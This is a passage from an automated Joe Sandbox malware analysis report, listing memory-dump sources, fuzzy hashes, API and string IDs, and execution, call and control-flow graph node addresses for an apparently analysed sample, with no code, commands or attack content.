                                                                                                                                                                                  • Instruction ID: 5e03f72d977d1aa63989bc143344e211518e471ea96a61756d8436ae7bb7a88a
                                                                                                                                                                                  • Opcode Fuzzy Hash: b8e5f875beba4a115b0b4e597fbe1613405be7b787a807e4b4a6fb678818b8b8
                                                                                                                                                                                  • Instruction Fuzzy Hash: B7315076A102599FCB20DF29CC41BEEB7F8EB54710F944596E859E3241FB34AE448FA0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction ID: ea11251b23579d69c7b52828429b039df4cdcd3be808fe0665997f527ddeef5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: CF91B570E842569BDF24DE69C881ABEB7E5FF44728F24469AE855E72C0DF3C8D408B50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                  • Opcode ID: a733d43706e704eab295929810c4fffa1a003004e5261fb38b402834666e70dd
                                                                                                                                                                                  • Instruction ID: 712f0126e25c9713e8804862ae292bf14637e8ab75d796fa8ce3f50c27fc91b8
                                                                                                                                                                                  • Opcode Fuzzy Hash: a733d43706e704eab295929810c4fffa1a003004e5261fb38b402834666e70dd
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8810971D002699BDB21DF54DC45BEEB7B8AF09750F1081EAA91DB7290E7709E84CFA0

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:30.3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                  Total number of Nodes:3
                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                  execution_graph 37 50389ba 38 50389c1 socket 37->38 40 5038a6e 38->40

                                                                                                                                                                                  Callgraph

                                                                                                                                                                                  callgraph 0 Function_05074CE6 1 Function_050389BA 2 Function_050387FA 1->2 3 Function_05035898 4 Function_05074CBA

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 0 50389ba-50389c0 1 50389c1-50389cf 0->1 2 50389d0 1->2 3 50389f8-50389fc 1->3 2->3 4 50389d2-50389f6 2->4 5 5038a4f-5038a52 3->5 6 50389fe-5038a16 3->6 4->1 8 5038a55-5038a59 5->8 7 5038a21-5038a27 6->7 7->5 9 5038a29-5038a4d 7->9 8->8 10 5038a5b-5038a68 socket 8->10 9->7 12 5038b05 10->12 13 5038a6e-5038a75 10->13 14 5038b50-5038b79 12->14 15 5038b07-5038b08 12->15 16 5038a80-5038a86 13->16 17 5038a88-5038aac 16->17 18 5038aae-5038ab2 16->18 17->16 20 5038af4-5038b02 call 50387fa 18->20 21 5038ab4-5038abb 18->21 20->12 22 5038ac6-5038acc 21->22 22->20 24 5038ace-5038af2 22->24 24->22
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000008.00000002.4147180609.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_4fc0000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                                                                  • Opcode ID: 5d74ee9ca9276a9febe35f65de1782e7c5bec6596a1cea3daf91ded093ea2afe
                                                                                                                                                                                  • Instruction ID: ea0f0ed1192fb8ef6dd96b2c755933aed9c285744abd90c72e089e222e76910c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d74ee9ca9276a9febe35f65de1782e7c5bec6596a1cea3daf91ded093ea2afe
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9519871E09158DFCF09CF98E491AADBBF6BF49314F1880C9E406AB351C734A902CB54